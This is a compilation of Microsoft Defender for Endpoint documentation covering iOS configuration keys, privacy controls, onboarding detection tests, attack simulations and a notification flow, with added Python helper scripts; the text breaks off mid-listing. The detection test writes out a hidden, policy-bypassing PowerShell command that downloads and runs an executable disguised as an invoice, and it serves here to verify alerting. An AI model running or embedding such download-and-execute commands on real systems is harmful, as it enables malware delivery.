Description: 1 - Audit, 0 - Disable (default), 2 - Enable. This setting is managed by an IT admin to enable, audit, or disable open network detection. In Audit mode, alerts are sent only to the ATP portal with no user-side experience. For a user experience, set the config to "Enable" mode.

Key: DefenderEndUserTrustFlowEnable
Default: false
Description: true - enable, false - disable; this setting is used by IT admins to enable or disable the end user in-app experience to trust and untrust unsecure and suspicious networks.

Key: DefenderNetworkProtectionAutoRemediation
Default: true
Description: true - enable, false - disable; this setting is used by the IT admin to enable or disable the remediation alerts that are sent when a user performs remediation activities like switching to safer Wi-Fi access points or deleting suspicious certificates detected by Defender.

Key: DefenderNetworkProtectionPrivacy
Default: true
Description: true - enable, false - disable; this setting is managed by the IT admin to enable or disable privacy in network protection.

5. In the Assignments section, an admin can choose groups of users to include and
exclude from the policy.

6. Review and create the configuration policy.

Coexistence of multiple VPN profiles


Apple iOS doesn't support multiple device-wide VPNs to be active simultaneously. While
multiple VPN profiles can exist on the device, only one VPN can be active at a time.

Configure Microsoft Defender for Endpoint risk signal in app protection policy (MAM)

Microsoft Defender for Endpoint on iOS enables the App Protection Policy scenario. End users can install the latest version of the app directly from the Apple App Store. For MAM registration to succeed, ensure the device is registered in Authenticator with the same account used to onboard to Defender.

Microsoft Defender for Endpoint can be configured to send threat signals to be used in
App Protection Policies (APP, also known as MAM) on iOS/iPadOS. With this capability,
you can use Microsoft Defender for Endpoint to protect access to corporate data from
unenrolled devices as well.

Follow the steps in Configure Defender risk signals in app protection policy (MAM) to set up app protection policies with Microsoft Defender for Endpoint.

For more details on MAM or app protection policy, see iOS app protection policy
settings.

Privacy Controls
Microsoft Defender for Endpoint on iOS enables Privacy Controls for both the Admins
and the End Users. This includes the controls for enrolled (MDM) and unenrolled (MAM)
devices.

For Customers with MDM, admins can configure the Privacy Controls through Managed
devices in the App Config. For Customers without enrollment, using MAM, admins can
configure the Privacy Controls through Managed apps in the App Config. End Users will
also have the ability to configure the Privacy Settings from the Defender App settings.

Configure privacy in phish alert report

Customers can now enable a privacy control for the phish report sent by Microsoft Defender for Endpoint on iOS, so that the domain name isn't included in a phish alert whenever a phishing website is detected and blocked by Microsoft Defender for Endpoint.

1. Admin Privacy Controls (MDM): Use the following steps to enable privacy and not collect the domain name as part of the phish alert report for enrolled devices.

a. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.

b. Give the policy a name, select Platform > iOS/iPadOS, and select the profile type.

c. Select Microsoft Defender for Endpoint as the target app.

d. On the Settings page, select Use configuration designer and add DefenderExcludeURLInReport as the key and Boolean as the value type.

To enable privacy and not collect the domain name, enter the value as true and assign this policy to users. By default, this value is set to false.

For users with the key set to true, the phish alert doesn't contain the domain name whenever a malicious site is detected and blocked by Defender for Endpoint.

e. Select Next and assign this profile to targeted devices/users.

2. Admin Privacy Controls (MAM): Use the following steps to enable privacy and not collect the domain name as part of the phish alert report for unenrolled devices.

a. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed apps.

b. Give the policy a name.

c. Under Select Public Apps, choose Microsoft Defender for Endpoint as the target app.

d. On the Settings page, under General Configuration Settings, add DefenderExcludeURLInReport as the key and true as the value.

To enable privacy and not collect the domain name, enter the value as true and assign this policy to users. By default, this value is set to false.

For users with the key set to true, the phish alert doesn't contain the domain name whenever a malicious site is detected and blocked by Defender for Endpoint.

e. Select Next and assign this profile to targeted devices/users.

3. End User Privacy Controls: These controls help the end user configure the information shared with their organization.

For Supervised devices, End User controls aren't visible; your admin decides and controls the settings. For Unsupervised devices, the control is displayed under Settings > Privacy.

Users see a toggle for Unsafe Site Info:

This toggle is only visible if the admin has set DefenderExcludeURLInReport = true.
If enabled by an admin, users can decide whether to send the unsafe site info to their organization.
By default, it's set to false, and the unsafe site information isn't sent.
If the user toggles it to true, the unsafe site details are sent.

Turning the above privacy controls on or off doesn't impact the device compliance check or conditional access.

Note

On Supervised devices with the configuration profile, Microsoft Defender for Endpoint can access the entire URL and, if it is found to be phishing, it is blocked. On an Unsupervised device, Microsoft Defender for Endpoint has access to only the domain name, and if the domain is not a phishing URL, it won't be blocked.

Optional Permissions
Microsoft Defender for Endpoint on iOS enables Optional Permissions in the
onboarding flow. Currently the permissions required by Defender for Endpoint are
mandatory in the onboarding flow. With this feature, admins can deploy Defender for
Endpoint on BYOD devices without enforcing the mandatory VPN Permission during
onboarding. End users can onboard the app without the mandatory permissions and
can later review these permissions. This feature is currently present only for enrolled
devices (MDM).

Configure Optional Permission

1. Admin flow (MDM): Use the following steps to enable Optional VPN permission for enrolled devices.

In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.

Give the policy a name, select Platform > iOS/iPadOS.

Select Microsoft Defender for Endpoint as the target app.

On the Settings page, select Use configuration designer and add DefenderOptionalVPN as the key and Boolean as the value type.
To enable optional VPN permission, enter the value as true and assign this policy to users. By default, this value is set to false.
For users with the key set to true, the users are able to onboard the app without giving the VPN permission.
Select Next and assign this profile to targeted devices/users.

2. End User flow - User installs and opens the app to start the onboarding.

If an admin has set up optional permissions, then the user can Skip VPN
permission and complete onboarding.
Even if the user has skipped VPN, the device is able to onboard, and a
heartbeat is sent.
If VPN is disabled, web protection isn't active.
Later, the user can enable web protection from within the app, which installs
the VPN configuration on the device.

Note

Optional Permission is different from Disable Web Protection. Optional VPN Permission only lets the user skip the permission during onboarding; the end user can later review and enable it. Disable Web Protection, by contrast, lets users onboard the Defender for Endpoint app without Web Protection, and it cannot be enabled later.

Jailbreak detection

Microsoft Defender for Endpoint can detect unmanaged and managed devices that are jailbroken. These jailbreak checks are done periodically. If a device is detected as jailbroken, these events occur:

A high-risk alert is reported to the Microsoft Defender portal. If device Compliance and Conditional Access are set up based on device risk score, the device is blocked from accessing corporate data.
User data in the app is cleared. When the user opens the app after jailbreaking, the VPN profile is also deleted and no web protection is offered.

Configure compliance policy against jailbroken devices

To protect corporate data from being accessed on jailbroken iOS devices, we recommend that you set up the following compliance policy in Intune.

Note

Jailbreak detection is a capability provided by Microsoft Defender for Endpoint on iOS. However, we recommend that you set up this policy as an additional layer of defense against jailbreak scenarios.

Follow the steps below to create a compliance policy against jailbroken devices.

1. In the Microsoft Intune admin center , go to Devices > Compliance policies >
Create Policy. Select "iOS/iPadOS" as platform and select Create.

2. Specify a name of the policy, such as Compliance Policy for Jailbreak.

3. In the compliance settings page, expand the Device Health section and select Block for the Jailbroken devices field.

4. In the Actions for noncompliance section, select the actions as per your requirements and select Next.

5. In the Assignments section, select the user groups that you want to include for this
policy and then select Next.

6. In the Review+Create section, verify that all the information entered is correct and
then select Create.

Configure custom indicators

Defender for Endpoint on iOS enables admins to configure custom indicators on iOS devices as well. For more information on how to configure custom indicators, see Manage indicators.

Note

Defender for Endpoint on iOS supports creating custom indicators only for URLs and domains. IP-based custom indicators aren't supported on iOS.

For iOS, no alerts are generated in Microsoft Defender XDR when the URL or domain set in the indicator is accessed.

Configure vulnerability assessment of apps

Reducing cyber risk requires comprehensive risk-based vulnerability management to identify, assess, remediate, and track all your biggest vulnerabilities across your most critical assets, all in a single solution. To learn more, see Microsoft Defender Vulnerability Management in Microsoft Defender for Endpoint.

Defender for Endpoint on iOS supports vulnerability assessments of the OS and apps.

Vulnerability assessment of iOS versions is available for both enrolled (MDM) and unenrolled (MAM) devices. Vulnerability assessment of apps is only for enrolled (MDM) devices. Admins can use the following steps to configure the vulnerability assessment of apps.

On a Supervised Device

1. Ensure the device is configured in Supervised mode.

2. To enable the feature, in the Microsoft Intune admin center, go to Endpoint Security > Microsoft Defender for Endpoint > Enable App sync for iOS/iPadOS devices.

Note

To get the list of all apps, including unmanaged apps, the admin has to enable Send full application inventory data on personally owned iOS/iPadOS devices in the Intune Admin Portal for supervised devices marked as "Personal". For supervised devices marked as "Corporate" in the Intune Admin Portal, the admin doesn't need to enable Send full application inventory data on personally owned iOS/iPadOS devices.

On an Unsupervised Device

1. To enable the feature, in the Microsoft Intune admin center, go to Endpoint Security > Microsoft Defender for Endpoint > Enable App sync for iOS/iPadOS devices.

2. To get the list of all apps, including unmanaged apps, enable the toggle Send full application inventory data on personally owned iOS/iPadOS devices.

3. Use the following steps to configure the privacy setting.

Go to Apps > App configuration policies > Add > Managed devices.
Give the policy a name, select Platform > iOS/iPadOS.
Select Microsoft Defender for Endpoint as the target app.
On the Settings page, select Use configuration designer and add DefenderTVMPrivacyMode as the key and String as the value type.
To disable privacy and collect the list of installed apps, enter the value as False and assign this policy to users.
By default, this value is set to True for unsupervised devices.
For users with the key set to False, Defender for Endpoint sends the list of apps installed on the device for vulnerability assessment.
Click Next and assign this profile to targeted devices/users.
Turning the above privacy controls on or off doesn't impact the device compliance check or conditional access.

4. Once the config is applied, the end user needs to open the app to approve the privacy setting.

The privacy approval screen appears only on unsupervised devices.

The app information is sent to the Defender for Endpoint console only if the end user approves the privacy setting.

Once the client versions are deployed to the target iOS devices, processing starts. Vulnerabilities found on those devices start showing up in the Defender Vulnerability Management dashboard. Processing might take a few hours (at most 24 hours) to complete, especially for the entire list of apps to show up in the software inventory.

Note

If you're using an SSL inspection solution on your iOS device, allow-list the domain names securitycenter.windows.com (commercial environment) and securitycenter.windows.us (GCC environment) for the TVM feature to work.

Disable sign out

Defender for Endpoint on iOS supports deployment without a sign-out button in the app, to prevent users from signing out of the Defender app. This is important to prevent users from tampering with the device.

This configuration is available for both enrolled (MDM) devices and unenrolled (MAM) devices. Admins can use the following steps to configure Disable sign out.

Configure Disable sign out

For enrolled devices (MDM)

1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies > Add > Managed devices.
2. Give the policy a name, select Platform > iOS/iPadOS.
3. Select Microsoft Defender for Endpoint as the target app.
4. On the Settings page, select Use configuration designer and add DisableSignOut as the key and String as the value type.
5. By default, DisableSignOut = false.
6. The admin needs to set DisableSignOut = true to disable the sign-out button in the app. Users won't see the sign-out button once the policy is pushed.
7. Click Next and assign this policy to targeted devices/users.

For unenrolled devices (MAM)

1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies > Add > Managed apps.
2. Give the policy a name.
3. Under Select Public Apps, choose Microsoft Defender for Endpoint as the target app.
4. On the Settings page, under General Configuration Settings, add DisableSignOut as the key and true as the value.
5. By default, DisableSignOut = false.
6. The admin needs to set DisableSignOut = true to disable the sign-out button in the app. Users won't see the sign-out button once the policy is pushed.
7. Click Next and assign this policy to targeted devices/users.

Important

This feature is in Public Preview. The following information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Device Tagging

Defender for Endpoint on iOS enables bulk tagging of mobile devices during onboarding by allowing admins to set up tags via Intune. The admin can configure the device tags through Intune configuration policies and push them to users' devices. Once the user installs and activates Defender, the client app passes the device tags to the Security Portal. The device tags appear against the devices in the Device Inventory.

This configuration is available for both enrolled (MDM) devices and unenrolled (MAM) devices. Admins can use the following steps to configure the device tags.

Configure Device tags

For enrolled devices (MDM)

1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies > Add > Managed devices.

2. Give the policy a name, select Platform > iOS/iPadOS.

3. Select Microsoft Defender for Endpoint as the target app.

4. On the Settings page, select Use configuration designer and add DefenderDeviceTag as the key and String as the value type.
The admin can assign a new tag by adding the key DefenderDeviceTag and setting a value for the device tag.
The admin can edit an existing tag by modifying the value of the key DefenderDeviceTag.
The admin can delete an existing tag by removing the key DefenderDeviceTag.

5. Click Next and assign this policy to targeted devices/users.

For unenrolled devices(MAM)

1. In the Microsoft Intune admin center, navigate to Apps > App configuration
policies > Add > Managed apps.
2. Give the policy a name.
3. Under the Select Public Apps, choose Microsoft Defender for Endpoint as the
target app.
4. On the Settings page, add DefenderDeviceTag as the key under General Configuration Settings.

Admin can assign a new tag by adding the key DefenderDeviceTag and
setting a value for device tag.
Admin can edit an existing tag by modifying the value of the key
DefenderDeviceTag.
Admin can delete an existing tag by removing the key DefenderDeviceTag.

5. Click Next and assign this policy to targeted devices/users.

Note

The Defender app needs to be opened for tags to be synced with Intune and passed to the Security Portal. It may take up to 18 hours for tags to appear in the portal.

Configure option to send in-app feedback

Customers now have the option to configure the ability to send feedback data to Microsoft within the Defender for Endpoint app. Feedback data helps Microsoft improve products and troubleshoot issues.

Note

For US Government cloud customers, feedback data collection is disabled by default.

Use the following steps to configure the option to send feedback data to Microsoft:

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.

2. Give the policy a name, and select Platform > iOS/iPadOS as the profile type.

3. Select Microsoft Defender for Endpoint as the target app.

4. On the Settings page, select Use configuration designer and add DefenderFeedbackData as the key and Boolean as the value type.

To remove the ability of end users to provide feedback, set the value as false and assign this policy to users. By default, this value is set to true. For US Government customers, the default value is set to false.

For users with the key set to true, there is an option to send feedback data to Microsoft within the app (Menu > Help & Feedback > Send Feedback to Microsoft).

5. Select Next and assign this profile to targeted devices/users.
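
The app configuration keys in the sections above (network protection, phish-report privacy, optional VPN permission, vulnerability-assessment privacy, disable sign out, device tagging and feedback) are all plain key/value pairs typed into Intune, and a mistyped key, an unexpected value or the wrong value type is easy to get wrong. As an added example that is not Microsoft's or this page's own code, the Python script below checks a proposed policy against the keys, value types, defaults and allowed values documented above and summarises what the resulting policy means for protection and data collection; the function names and the dict input format are this example's own assumptions.

```python
"""Sanity-check an Intune app configuration for Microsoft Defender for Endpoint on iOS.

Added example, not Microsoft's code. KEY_SPEC transcribes the keys, value types,
defaults and allowed values documented on this page; the function names, the input
format (a dict of key -> value as typed into the configuration designer or General
Configuration Settings) and the summary wording are this example's own assumptions.
Nothing here talks to Intune or Graph.
"""

# key: (value type named by the page, or None where the page gives only the value;
#       allowed values, or None for free text; documented default)
# DisableSignOut and DefenderTVMPrivacyMode hold true/false but the page assigns them
# the String value type in the designer, so they must be added as String, not Boolean.
KEY_SPEC = {
    "DefenderNetworkProtectionEnable": (None, {"true", "false"}, "false"),
    "DefenderOpenNetworkDetection": (None, {"0", "1", "2"}, "0"),
    "DefenderEndUserTrustFlowEnable": (None, {"true", "false"}, "false"),
    "DefenderNetworkProtectionAutoRemediation": (None, {"true", "false"}, "true"),
    "DefenderNetworkProtectionPrivacy": (None, {"true", "false"}, "true"),
    "DefenderExcludeURLInReport": ("Boolean", {"true", "false"}, "false"),
    "DefenderOptionalVPN": ("Boolean", {"true", "false"}, "false"),
    "DefenderTVMPrivacyMode": ("String", {"true", "false"}, "true"),  # page writes True/False
    "DisableSignOut": ("String", {"true", "false"}, "false"),
    "DefenderDeviceTag": ("String", None, None),
    "DefenderFeedbackData": ("Boolean", {"true", "false"}, "true"),  # false for US Gov cloud
}
OPEN_NETWORK_MODES = {"0": "disabled", "1": "audit (alerts only in the portal, no user experience)", "2": "enabled"}


def validate(config):
    """Return problem strings; an empty list means every key and value matches the page."""
    problems, by_lower = [], {k.lower(): k for k in KEY_SPEC}
    for key, value in config.items():
        if key not in KEY_SPEC:
            hint = by_lower.get(key.lower())
            problems.append(f"unknown key {key!r}" + (f" (did you mean {hint!r}?)" if hint else ""))
            continue
        allowed = KEY_SPEC[key][1]
        text = str(value).strip()  # Python bools render as True/False, hence the case-insensitive compare
        if allowed is None and not text:
            problems.append(f"{key}: empty value")
        elif allowed is not None and text.lower() not in allowed:
            problems.append(f"{key}: value {text!r} not in {sorted(allowed)}")
    return problems


def effective(config):
    """Fill in the page's documented defaults for every key the policy leaves out."""
    eff = {}
    for key, (_, allowed, default) in KEY_SPEC.items():
        if key not in config:
            eff[key] = default
        else:
            text = str(config[key]).strip()
            eff[key] = text if allowed is None else text.lower()
    return eff


def posture(config):
    """Describe what the policy means for protection and data collection, per this page."""
    problems = validate(config)
    if problems:
        raise ValueError("; ".join(problems))
    eff = effective(config)
    on = lambda k: eff[k] == "true"
    notes = [
        "network protection: " + ("enabled" if on("DefenderNetworkProtectionEnable") else "disabled (the default)"),
        "open network detection: " + OPEN_NETWORK_MODES[eff["DefenderOpenNetworkDetection"]],
        "phish alerts " + ("omit the domain name; unsupervised users get an Unsafe Site Info toggle, off by default"
                           if on("DefenderExcludeURLInReport") else "include the domain name"),
        "installed-app list " + ("is sent for vulnerability assessment (unsupervised users must approve in-app)"
                                 if eff["DefenderTVMPrivacyMode"] == "false" else "is not sent (TVM privacy mode on)"),
    ]
    if on("DefenderOptionalVPN"):
        notes.append("VPN permission can be skipped at onboarding; web protection stays inactive until the user enables it in the app")
    if on("DisableSignOut"):
        notes.append("sign-out button hidden in the app")
    if eff["DefenderFeedbackData"] == "false":
        notes.append("in-app feedback to Microsoft removed")
    if eff["DefenderDeviceTag"]:
        notes.append(f"device tag {eff['DefenderDeviceTag']!r} appears in Device Inventory after the app is opened (up to 18 hours)")
    # None of these settings change the device compliance check or Conditional Access.
    return notes


if __name__ == "__main__":
    # Constructed sample: a BYOD profile with privacy controls on and sign-out disabled.
    sample = {
        "DefenderOpenNetworkDetection": "2",
        "DefenderExcludeURLInReport": "true",
        "DefenderOptionalVPN": "true",
        "DisableSignOut": "true",
    }
    for problem in validate(sample) or ["no problems found"]:
        print(problem)
    for note in posture(sample):
        print("-", note)
```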

Report unsafe site

Phishing websites impersonate trustworthy websites for the purpose of obtaining your personal or financial information. Visit the Provide feedback about network protection page to report a website that could be a phishing site.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.

Privacy information - Microsoft Defender for Endpoint on iOS
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

Defender for Endpoint on iOS uses a VPN to provide the Web Protection feature. This is not a regular VPN; it is a local or self-looping VPN that does not take traffic outside the device. Neither Microsoft nor your organization sees your browsing activity.

Defender for Endpoint on iOS collects information from your configured iOS devices
and stores it in the same tenant where you have Defender for Endpoint. The information
is collected to help keep Defender for Endpoint on iOS secure, up to date, performing as
expected, and to support the service.

For more information about data storage, see Microsoft Defender for Endpoint data
storage and privacy.

For more information on the most common privacy questions about Microsoft Defender for Endpoint on Android and iOS mobile devices, see Microsoft Defender for Endpoint and your privacy on Android and iOS mobile devices.

Required data
Required data consists of data that is necessary to make Defender for Endpoint on iOS
work as expected. This data is essential to the operation of the service and can include
data related to the end user, organization, device, and apps.

Here is a list of the types of data being collected:

Web page or Network information
Domain name and IP address of the website, only when a malicious connection or web page is detected. This information is collected only when the Privacy setting is disabled or turned off.

Device and account information

Device information such as date & time, iOS version, CPU info, and Device identifier, where Device identifier is one of the following:
Wi-Fi adapter MAC address
Randomly generated globally unique identifier (GUID)
Tenant, Device, and User information
Microsoft Entra Device ID and Azure User ID - uniquely identify the device and the user, respectively, in Microsoft Entra ID.
Azure tenant ID - GUID that identifies your organization within Microsoft Entra ID.
Microsoft Defender for Endpoint org ID - Unique identifier associated with the enterprise that the device belongs to. Allows Microsoft to identify if there are issues affecting a select set of enterprises and the number of enterprises impacted.
User Principal Name - Email ID of the user.

Product and service usage data

The following information is collected only for the Microsoft Defender for Endpoint app installed on the device.

App package info, including name, version, and app upgrade status.
Actions done in the app.
Crash report logs generated by iOS.
Memory usage data.

Optional Data
Optional data includes diagnostic data and feedback data from the client. Optional
diagnostic data is additional data that helps us make product improvements and
provides enhanced information to help us detect, diagnose, and fix issues. This data is
only for diagnostic purposes and is not required for the service itself.

Optional diagnostic data includes:

App, CPU, and network usage for Defender for Endpoint.
Features configured by the admin for Defender for Endpoint.

Feedback Data is collected through in-app feedback provided by the user.

The user's email address, if they choose to provide it.
Feedback type (smile, frown, idea) and any feedback comments submitted by the user.
For more information, see More on Privacy.

Run a detection test on a device recently onboarded to Microsoft Defender for Endpoint
Article • 02/22/2024

Applies to:

Windows 11
Supported Windows 10 versions
Windows Server 2012 R2
Windows Server 2016
Windows Server, version 1803
Windows Server 2019
Windows Server 2022
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

When you add a device to the Microsoft Defender for Endpoint service for management,
it's referred to as onboarding. Onboarding allows devices to report signals about their
health status to the service.

Verifying that a device is added to the service successfully is a critical step in the entire
deployment process. It helps ensure that all the devices expected are being managed.

Verify Microsoft Defender for Endpoint onboarding of a device using a PowerShell detection test
Run the following PowerShell script on a newly onboarded device to verify that it's
properly reporting to the Defender for Endpoint service.

1. Open an elevated command-line prompt on the device and run the script:

a. Go to Start and type cmd.

b. Right-click Command Prompt and select Run as administrator.

2. At the prompt, copy and run the following command:

PowerShell

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'

The Command Prompt window closes automatically. If successful, a new alert appears in
the portal for the onboarded device in about 10 minutes.

Note

You can also use the EICAR test string to perform this test. Create a text file, paste
the EICAR line, and save the file as an executable file to your endpoint's local drive.
You will receive a test endpoint notification and an alert in the Microsoft Defender
portal.

Related articles
Onboard Windows devices
Onboard servers
Troubleshoot Microsoft Defender for Endpoint onboarding issues

Integration with Microsoft Defender for Cloud
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Cloud

Microsoft Defender for Endpoint can integrate with Microsoft Defender for Cloud to
provide a comprehensive Windows server protection solution. With this integration,
Microsoft Defender for Cloud can use the power of Defender for Endpoint to provide
improved threat detection for Windows Servers.

The following capabilities are included in this integration:

Automated onboarding - The Defender for Endpoint sensor is automatically enabled on Windows Servers that are onboarded to Microsoft Defender for Cloud. For more information on Microsoft Defender for Cloud onboarding, see Use the integrated Microsoft Defender for Endpoint license.

Note

The integration between Microsoft Defender for servers and Microsoft Defender for Endpoint has been expanded to support Windows Server 2019 and Azure Virtual Desktop (AVD).

Windows servers monitored by Microsoft Defender for Cloud will also be available
in Defender for Endpoint - Microsoft Defender for Cloud seamlessly connects to
the Defender for Endpoint tenant, providing a single view across clients and
servers. In addition, Defender for Endpoint alerts will be available in the Microsoft
Defender for Cloud console.

Server investigation - Microsoft Defender for Cloud customers can access the
Microsoft Defender portal to perform detailed investigation to uncover the scope
of a potential breach.

Important

When you use Microsoft Defender for Cloud to monitor servers, a Defender
for Endpoint tenant is automatically created (in the US for US users, in the EU
for European and UK users). Data collected by Defender for Endpoint is stored
in the geo-location of the tenant as identified during provisioning.
If you use Defender for Endpoint before using Microsoft Defender for Cloud,
your data will be stored in the location you specified when you created your
tenant even if you integrate with Microsoft Defender for Cloud at a later time.
Once configured, you cannot change the location where your data is stored. If
you need to move your data to another location, you need to contact
Microsoft Support to reset the tenant. Server endpoint monitoring utilizing
this integration has been disabled for Office 365 GCC customers.

Related topics
Onboard previous versions of Windows
Onboard Windows Server 2012 R2, 2016, SAC version 1803, and 2019

Experience Microsoft Defender for Endpoint through simulated attacks
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

 Tip

Learn about the latest enhancements in Microsoft Defender for Endpoint: What's new in Defender for Endpoint?
Defender for Endpoint demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation. Read: Insights from the MITRE ATT&CK-based evaluation.

You might want to experience Defender for Endpoint before you onboard more than a
few devices to the service. To do this, you can run controlled attack simulations on a few
test devices. After running the simulated attacks, you can review how Defender for
Endpoint surfaces malicious activity and explore how it enables an efficient response.

Before you begin

To run any of the provided simulations, you need at least one onboarded device.

Read the walkthrough document provided with each attack scenario. Each document
includes OS and application requirements as well as detailed instructions that are
specific to an attack scenario.

Run a simulation
1. In Endpoints > Evaluation & tutorials > Tutorials & simulations, select which of
the available attack scenarios you would like to simulate:
Scenario 1: Document drops backdoor - simulates delivery of a socially
engineered lure document. The document launches a specially crafted
backdoor that gives attackers control.
Scenario 2: PowerShell script in fileless attack - simulates a fileless attack
that relies on PowerShell, showcasing attack surface reduction and device
learning detection of malicious memory activity.
Scenario 3: Automated incident response - triggers automated investigation,
which automatically hunts for and remediates breach artifacts to scale your
incident response capacity.

2. Download and read the corresponding walkthrough document provided with your
selected scenario.

3. Download the simulation file or copy the simulation script by navigating to Evaluation & tutorials > Tutorials & simulations. You can choose to download the file or script on the test device but it's not mandatory.

4. Run the simulation file or script on the test device as instructed in the walkthrough
document.

Note

Simulation files or scripts mimic attack activity but are actually benign and will not
harm or compromise the test device.

You can also use the EICAR test file or the EICAR test text string to perform some
tests. It is possible to test real-time protection features (create a text file, paste the
EICAR text, and save the file as an executable file to your endpoint's local drive—
you will get a notification on the test endpoint and an alert in the MDE console) or
EDR protection (you need to temporarily disable real-time protection on the test
endpoint and save the EICAR test file, and then try to execute, copy, or move this
file). After you run your tests, enable real-time protection on the test endpoint.

Want to experience Defender for Endpoint? Sign up for a free trial.

Related topics
Onboard devices
Onboard Windows devices

Create a notification rule when a local onboarding or offboarding script is used
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Create a notification rule so that when a local onboarding or offboarding script is used,
you are notified.

Before you begin

You need to have access to:

Power Automate (Per-user plan at a minimum). For more information, see the Power Automate pricing page.
Azure Table or SharePoint List or Library / SQL DB.

Create the notification flow

1. Go to make.powerautomate.com.

2. Navigate to My flows > New > Scheduled - from blank.

3. Build a scheduled flow.

a. Enter a flow name.
b. Specify the start date and time.
c. Specify the frequency. For example, every 5 minutes.

4. Select the + button to add a new action. The new action is an HTTP request to the
Defender for Endpoint devices API. You can also replace it with the out-of-the-box
WDATP Connector (action: Machines - Get list of machines).

5. Enter the following HTTP fields:

Method: GET as a value to get the list of devices.
URI: Enter https://api.securitycenter.microsoft.com/api/machines.
Authentication: Select Active Directory OAuth.
Tenant: Sign-in to https://portal.azure.com and navigate to Microsoft Entra
ID > App Registrations and get the Tenant ID value.
Audience: https://securitycenter.onmicrosoft.com/windowsatpservice\
Client ID: Sign-in to https://portal.azure.com and navigate to Microsoft
Entra ID > App Registrations and get the Client ID value.
Credential Type: Select Secret.
Secret: Sign-in to https://portal.azure.com and navigate to Microsoft Entra
ID > App Registrations and get the Tenant ID value.

6. Add a new step by selecting Add new action then search for Data Operations and
select Parse JSON.

7. Add Body in the Content field.

8. Select the Use sample payload to generate schema link.


9. Copy and paste the following JSON snippet. (The leading @ of @odata.context is
written as @@ because Power Automate treats a string that starts with @ as an
expression.)

JSON

{
  "type": "object",
  "properties": {
    "@@odata.context": {
      "type": "string"
    },
    "value": {
      "type": "array",
      "items": {
        "type": "object",
        "properties": {
          "id": {
            "type": "string"
          },
          "computerDnsName": {
            "type": "string"
          },
          "firstSeen": {
            "type": "string"
          },
          "lastSeen": {
            "type": "string"
          },
          "osPlatform": {
            "type": "string"
          },
          "osVersion": {},
          "lastIpAddress": {
            "type": "string"
          },
          "lastExternalIpAddress": {
            "type": "string"
          },
          "agentVersion": {
            "type": "string"
          },
          "osBuild": {
            "type": "integer"
          },
          "healthStatus": {
            "type": "string"
          },
          "riskScore": {
            "type": "string"
          },
          "exposureScore": {
            "type": "string"
          },
          "aadDeviceId": {},
          "machineTags": {
            "type": "array"
          }
        },
        "required": [
          "id",
          "computerDnsName",
          "firstSeen",
          "lastSeen",
          "osPlatform",
          "osVersion",
          "lastIpAddress",
          "lastExternalIpAddress",
          "agentVersion",
          "osBuild",
          "healthStatus",
          "rbacGroupId",
          "rbacGroupName",
          "riskScore",
          "exposureScore",
          "aadDeviceId",
          "machineTags"
        ]
      }
    }
  }
}
10. Extract the values from the JSON call and check whether the onboarded devices are
already registered, for example in a SharePoint list:

If yes, no notification is triggered.

If no, register the newly onboarded devices in the SharePoint list and send a
notification to the Defender for Endpoint admin.

11. Under Condition, add the following expression: length(body('Get_items')?['value'])
and set the condition to equal to 0.

Alert notification
The following image is an example of an email notification.

Tips
You can filter here using lastSeen only:
Every 60 min:
Take all devices last seen in the past seven days.

For each device:

If the last seen property is in the one-hour interval [-7 days, -7 days + 60
minutes] -> Alert for offboarding possibility.
If first seen is in the past hour -> Alert for onboarding.

In this solution, you don't have duplicate alerts.

There are tenants that have numerous devices. Getting all those devices might require
paging.

You can split it to two queries:

1. For offboarding take only this interval using the OData $filter and only notify if the
conditions are met.

2. Take all devices last seen in the past hour and check first seen property for them (if
the first seen property is on the past hour, the last seen must be there too).
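The flow logic of steps 10 and 11 together with the lastSeen/firstSeen variant from the tips, as an added Python example that is not part of the article or of Power Automate: the response body is constructed to match the Parse JSON schema above, a Python set stands in for the SharePoint list, the run time is pinned to a fixed value so the result is reproducible, and the $filter strings assume the OData comparison syntax the devices API accepts on lastSeen.

```python
"""Detect newly onboarded and possibly offboarded devices from a Defender for
Endpoint /api/machines response (added example, not from the article)."""
import json
from datetime import datetime, timedelta, timezone

# Fixed "now" so the example is reproducible; a real flow uses the run time.
NOW = datetime(2024, 2, 22, 12, 0, tzinfo=timezone.utc)

# Constructed sample body shaped like the article's Parse JSON schema.
SAMPLE_RESPONSE = json.dumps({
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
    "value": [
        {"id": "m-ws01", "computerDnsName": "ws01.contoso.local",
         "firstSeen": "2022-01-10T08:00:00.0000000Z",
         "lastSeen": "2024-02-22T11:55:00.1234567Z", "healthStatus": "Active"},
        {"id": "m-ws02", "computerDnsName": "ws02.contoso.local",
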